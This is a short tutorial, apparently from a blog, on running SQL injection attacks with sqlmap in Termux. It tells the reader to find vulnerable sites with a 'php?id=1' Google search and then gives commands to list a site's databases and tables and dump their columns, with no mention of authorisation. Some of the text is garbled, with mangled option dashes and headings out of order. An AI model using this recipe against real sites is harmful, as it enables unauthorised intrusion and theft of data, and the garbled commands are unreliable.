Today we will talk about what SQL injection is and how to perform this attack on a website using Termux. For this we will use the SQLmap utility.
apt update -y && apt upgrade -y && apt install python2 git -y
git clone https://github.com/sqlmapproject/sqlmap.git
Find vulnerable site
These kind of vulnerabilities remained on obsolete sites written in obsolete JPe – PHP. They are very easy to find if you hit Google with “php?id=1“.
Here is an example of a vulnerable site:
python2 sqlmap.py -u <url vulnerable website> –dbs
And here are the databases:
python2 sqlmap.py -u <url vulnerable website> -D <database> -tables
See all tables in this database:
python2 sqlmap.py -u <url vulnerable website> -D <database> -T <table> -C <column> –dump
Dump a certain column in the table:
How to see the dump?
cd “folder name”
cat “file name”